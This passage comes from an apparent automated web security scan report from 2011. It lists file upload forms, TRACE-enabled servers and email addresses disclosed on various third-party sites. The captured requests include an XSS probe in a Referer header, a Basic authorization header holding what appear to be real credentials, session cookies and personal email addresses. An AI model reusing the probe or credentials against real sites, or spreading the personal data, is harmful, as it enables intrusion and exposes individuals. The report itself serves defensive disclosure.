</label>: <input id="PATCH" type="FILE" name="patch" maxlength="102400"
accept="text/*" />
<br />
...[SNIP]...

22.4. http://www.netlingo.com/add.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /add.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • http://www.netlingo.com/ajaxforms/word-action.php
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /add.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</span>
<input id="fileToUpload" type="file" size="40" name="fileToUpload" class="inputAreaa" onClick="setFlag();" />
<input name="imageid" id="imageid" type="hidden" value="1" />
...[SNIP]...

22.5. http://www.sailinganarchy.com/article_submission.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /article_submission.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • http://www.sailinganarchy.com/article_submission.php
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /article_submission.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Vary: User-Agent
Content-Length: 3970
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<p>
            <input name="attachment1" type="file" id="attachment1" size="75" maxlength="255" />
            &nbsp;</p>
...[SNIP]...

22.6. http://www.thisnext.com/pick/new/submit/sociable/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisnext.com
Path:   /pick/new/submit/sociable/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:
  • https://www.thisnext.com/signup2/
Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...
</span>
<input type="file" name="media:new0:file" />
</label>
...[SNIP]...

23. TRACE method is enabled
There are 6 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


23.1. https://billing.cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /

Request

TRACE / HTTP/1.0
Host: billing.cloudaccess.net
Cookie: 35afbb40cb16d135

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:23 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: billing.cloudaccess.net
Cookie: 35afbb40cb16d135


23.2. http://cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudaccess.net
Path:   /

Request

TRACE / HTTP/1.0
Host: cloudaccess.net
Cookie: d1dc3f996f59356

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:40 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: cloudaccess.net
Cookie: d1dc3f996f59356


23.3. http://demo.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /

Request

TRACE / HTTP/1.0
Host: demo.joomla.org
Cookie: bbfaaca11f3430e1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:51 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: demo.joomla.org
Cookie: bbfaaca11f3430e1


23.4. http://www.cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 9ea38f6789e13d8a

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 9ea38f6789e13d8a


23.5. https://www.cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 3d69c231cf8902c9

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:54:52 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cloudaccess.net
Cookie: 3d69c231cf8902c9


23.6. http://www.x64bitdownload.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:55 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.x64bitdownload.com
Cookie: be57fe7a3b8d4ea7


24. Email addresses disclosed
There are 489 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


24.1. https://acc.newsguy.com/user/-/accnt_contact

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/accnt_contact

Issue detail

The following email address was disclosed in the response:
  • h02332@gmail.com

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...
<input type="text" name="email" value="h02332@gmail.com" size="23">
...[SNIP]...

24.2. http://ads.adbrite.com/adserver/behavioral-data/8201

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following email address was disclosed in the response:
  • 4d3de9ff@loadus.exelator.com

Request

GET /adserver/behavioral-data/8201?d=49,123 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z1fSUUpKzMtLLcoEK1CqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d3db691@www.hotelsbycity.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:07:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; Domain=.adbrite.com; Expires=Thu, 21-Jan-2021 21:07:11 GMT; Path=/
Set-Cookie: vsd="0@1@4d3de9ff@loadus.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

24.3. http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.doclix.com
Path:   /adserver/serve/js/doclix_synd_overlay.js

Issue detail

The following email address was disclosed in the response:
  • feedback@adside.com

Request

GET /adserver/serve/js/doclix_synd_overlay.js HTTP/1.1
Host: ads.doclix.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:41 GMT
Last-Modified: Fri, 21 Jan 2011 19:04:02 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Length: 23745

/*[AdSide/DOCLIX anchor ad unit: first tier]*/

if (typeof doclix_lib == 'undefined') {
   (function () {/*[load common script library v1.0]*/
       var d = document, gT = 'getElementsByTagName', cE = '
...[SNIP]...
<a href="mailto:feedback@adside.com">feedback@adside.com</a>
...[SNIP]...

24.4. http://aws.amazon.com/ec2/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aws.amazon.com
Path:   /ec2/x22

Issue detail

The following email address was disclosed in the response:
  • aws@amazon.com

Request

GET /ec2/x22 HTTP/1.1
Host: aws.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:01:50 GMT
Server: Server
Vary: Host,Accept-Language,Accept-Encoding,User-Agent
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html
Content-Length: 6282


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="icon" ty
...[SNIP]...
<a href="mailto:aws@amazon.com">
...[SNIP]...

24.5. http://aws.amazon.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aws.amazon.com
Path:   /x22

Issue detail

The following email address was disclosed in the response:
  • aws@amazon.com

Request

GET /x22 HTTP/1.1
Host: aws.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:01:49 GMT
Server: Server
Vary: Host,Accept-Language,Accept-Encoding,User-Agent
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html
Content-Length: 6282


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="icon" ty
...[SNIP]...
<a href="mailto:aws@amazon.com">
...[SNIP]...

24.6. http://backend.parenthood.com/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://backend.parenthood.com
Path:   /s_code.js

Issue detail

The following email address was disclosed in the response:
  • id@Us.tc

Request

GET /s_code.js HTTP/1.1
Host: backend.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:08:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 02 May 2008 19:53:56 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Content-Type: application/x-javascript
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 22461

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="deparenthood"
var s=s_gi(s_account)
/******************
...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

24.7. http://blog.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.tweetmeme.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • kate@tweetmeme.com

Request

GET / HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/about
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
Last-Modified: Mon, 24 Jan 2011 22:05:27 GMT
Accept-Ranges: bytes
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 22:26:24 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="mailto:kate@tweetmeme.com" target="_blank">
...[SNIP]...

24.8. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The following email addresses were disclosed in the response:
  • aldous.gc@wanadoo.fr
  • bill@farryachtsales.com
  • ed@sailinganarchy.com
  • editor@sailinganarchy.com
  • erik@bosrup.com
  • helpdesk@example.com
  • info@BicSportNA.com
  • info@sailinganarchy.com
  • klaus.hartl@stilbuero.de
  • krista@trippdesign.net
  • luiz@intercreate.com
  • markracine@gmail.com
  • sales@cstcomposites.com
  • sam@conio.net
  • scot@sailinganarchy.com
  • support@yachtscoring.com
  • webmaster@EchoChrist.com
  • www.stcroixyc@gmail.com

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 25 Jan 2011 00:57:12 GMT
Accept-Ranges: bytes
ETag: "ac6a35cd2abccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 00:57:16 GMT
Content-Length: 1525922

<html><head><title>SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89</title>
   <meta name="description" content="XSS, Cross Site Scripting, XPath Injection, SQL Injection, DORK, CWE-79, CAPEC-8
...[SNIP]...
EXT">You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).</span>
...[SNIP]...
<li>klaus.hartl@stilbuero.de</li>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<li>erik@bosrup.com</li>
...[SNIP]...
<span class="HIGHLIGHT">erik@bosrup.com</span>
...[SNIP]...
<li>klaus.hartl@stilbuero.de</li>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<span class="HIGHLIGHT">klaus.hartl@stilbuero.de</span>
...[SNIP]...
<li>erik@bosrup.com</li>
...[SNIP]...
<span class="HIGHLIGHT">erik@bosrup.com</span>
...[SNIP]...
<li>aldous.gc@wanadoo.fr</li>
...[SNIP]...
<span class="HIGHLIGHT">aldous.gc@wanadoo.fr</span>
...[SNIP]...
<li>sam@conio.net</li>
...[SNIP]...
<span class="HIGHLIGHT">sam@conio.net</span>
...[SNIP]...
<li>scot@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">scot@sailinganarchy.com</span>
...[SNIP]...
<li>support@yachtscoring.com</li><li>www.stcroixyc@gmail.com</li>
...[SNIP]...
<span class="HIGHLIGHT">www.stcroixyc@gmail.com</span>
...[SNIP]...
<span class="HIGHLIGHT">support@yachtscoring.com</span>
...[SNIP]...
<li>editor@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<li>bill@farryachtsales.com</li>
...[SNIP]...
<li>editor@sailinganarchy.com</li><li>info@BicSportNA.com</li><li>krista@trippdesign.net</li><li>sales@cstcomposites.com</li>
...[SNIP]...
<span class="HIGHLIGHT">info@BicSportNA.com</span>"&gt;<span class="HIGHLIGHT">info@BicSportNA.com</span>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<span class="HIGHLIGHT">krista@trippdesign.net</span>
...[SNIP]...
<span class="HIGHLIGHT">sales@cstcomposites.com</span>"&gt;<span class="HIGHLIGHT">sales@cstcomposites.com</span>
...[SNIP]...
<span class="HIGHLIGHT">bill@farryachtsales.com</span>
...[SNIP]...
<li>editor@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">editor@sailinganarchy.com</span>
...[SNIP]...
<li>markracine@gmail.com</li>
...[SNIP]...
<span class="HIGHLIGHT">markracine@gmail.com</span>
...[SNIP]...
<span class="HIGHLIGHT">markracine@gmail.com</span>
...[SNIP]...
<li>webmaster@EchoChrist.com</li>
...[SNIP]...
<span class="HIGHLIGHT">webmaster@EchoChrist.com</span>
...[SNIP]...
<li>ed@sailinganarchy.com</li><li>info@sailinganarchy.com</li>
...[SNIP]...
<span class="HIGHLIGHT">info@sailinganarchy.com</span>
...[SNIP]...
<span class="HIGHLIGHT">ed@sailinganarchy.com</span>
...[SNIP]...
<li>luiz@intercreate.com</li>
...[SNIP]...
<span class="HIGHLIGHT">luiz@intercreate.com</span>
...[SNIP]...

24.9. http://cdn.statics.live.spongecell.com/ups/v3m/lib/en/resources.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.statics.live.spongecell.com
Path:   /ups/v3m/lib/en/resources.xml

Issue detail

The following email address was disclosed in the response:
  • adbox@spongecell.com

Request

GET /ups/v3m/lib/en/resources.xml HTTP/1.1
Host: cdn.statics.live.spongecell.com
Proxy-Connection: keep-alive
Referer: http://cdn.statics.live.spongecell.com/ups/v3m/bin/RectangleGrid.swf?placementId=&flightId=&clickthroughUrl=http%3A%2F%2Fbs.serving-sys.com%2FBurstingPipe%2FadServer.bs%3Fcn%3Dtf%26c%3D20%26mc%3Dclick%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D&actionsType=Rectangle&backupImageUrl=http%3A%2F%2Fcdn.statics.live.spongecell.com%2Fups%2Fv3m%2Fassets%2F300x250.jpg&hostBaseUrl=spongecell.com&creativeSwfUrl=..%2Fassets%2F300x250.swf&subMenuType=Pop&menuType=Grid&height=250&trackingPixel=http%3A%2F%2Fbs.serving-sys.com%2FBurstingPipe%2FadServer.bs%3Fcn%3Dtf%26c%3D19%26mc%3Dimp%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D%26rtu%3D-1&widgetId=264001&trackImpressions=0&width=300&linkPrefixDecoded=SPONGECELL_CLICK_TAG&clickTag=http%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dtf%26c%3D20%26mc%3Dclick%26pli%3D2150004%26PluID%3D0%26ord%3D%5Btimestamp%5D&clickTag1=http%3A//www.facebook.com/%23%21/ups&clickTag2=http%3A//twitter.com/ups&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: tKThkNzaXdFEi9ZbXvmjV3P76LMHvrCE18ULH1xhAjDyzXQd1sv7YgzeNIP4TmGa
x-amz-request-id: ABFB62588C360383
x-amz-meta-s3fox-filesize: 15922
x-amz-meta-s3fox-modifiedtime: 1292954348000
Accept-Ranges: bytes
Content-Type: text/xml
Server: AmazonS3
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:21:04 GMT
Last-Modified: Tue, 21 Dec 2010 17:59:22 GMT
Connection: keep-alive
Content-Length: 15922

<?xml version="1.0" encoding="utf-8"?>
<resources>
<screens>
<default>
<info><eventInfo><![CDATA[<p>[event title]<br/>[event when]</p>]]></eventInfo></info>
<missingURL>http://d
...[SNIP]...
<field name="trackingMessage" recipients="adbox@spongecell.com" subject="Spongecell Form Submission - [ad id]" template="Blank"/>
...[SNIP]...

24.10. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following email address was disclosed in the response:
  • TenSafeF...@gmail.com

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...
